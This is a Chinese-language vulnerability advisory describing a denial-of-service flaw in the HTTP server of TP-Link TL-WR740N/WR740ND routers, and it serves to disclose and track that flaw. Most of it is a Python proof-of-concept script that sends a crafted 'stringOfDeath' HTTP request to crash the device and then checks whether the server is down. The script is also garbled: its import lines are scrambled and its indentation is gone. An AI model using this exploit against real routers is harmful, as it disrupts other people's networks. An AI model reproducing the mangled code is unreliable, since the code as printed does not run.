TP-Link Wireless N Routers HTTP处理拒绝服务漏洞
信息来源:Dino Caus 发表日期:2013-04-01 15:45:00
TL-WR740N及TL-WR740ND都是150Mbps的无线路由器。
TP-Link TL-WR740N/TL-WR740ND 固件版本3.12.11 Build 120320 Rel.51047n在处理特制HTTP请求时存在拒绝服务漏洞,攻击者可利用此漏洞导致受影响设备崩溃。
BUGTRAQ-ID:64068
受影响系统:
TP-LINK TL-WR740N
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python
import socket
import import
sys urllib2
host = ""
port = 0
if(len(sys.argv) >= 2):
host = sys.argv[1]
port = sys.argv[2]
else:
print "Invalid number of the arguments."
print "Usage <server> <port>"
exit(1)
print "Connecting on ",host,":",port
s = socket.socket();
stringOfDeath = "GET / HTTP/1.1\\r\\n";
stringOfDeath = stringOfDeath + "Accept-Encoding: identity\\r\\n";
stringOfDeath = stringOfDeath + "Host: "+ host + "\\r\\n";
stringOfDeath = stringOfDeath + "Connection: close\\r\\n";
stringOfDeath = stringOfDeath + "User-Agent: PythonLib/2.7\\r\\n";
s.connect((host,int(port)))
print "Sending packet..."
s.send(stringOfDeath)
print "Packet sent."
print "Check if router http server down..."
try:
response = urllib2.urlopen("http://"+host+":"+port,None,5)
response.read()
except socket.timeout:
print "Timeout occured, http server probaly down."
exit(1)
解决办法:
厂商补丁:
TP-LINK
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.tp-link.com.au/products/details/?model=TL-WR740N
参考信息:
http://www.exploit-db.com/exploits/29919/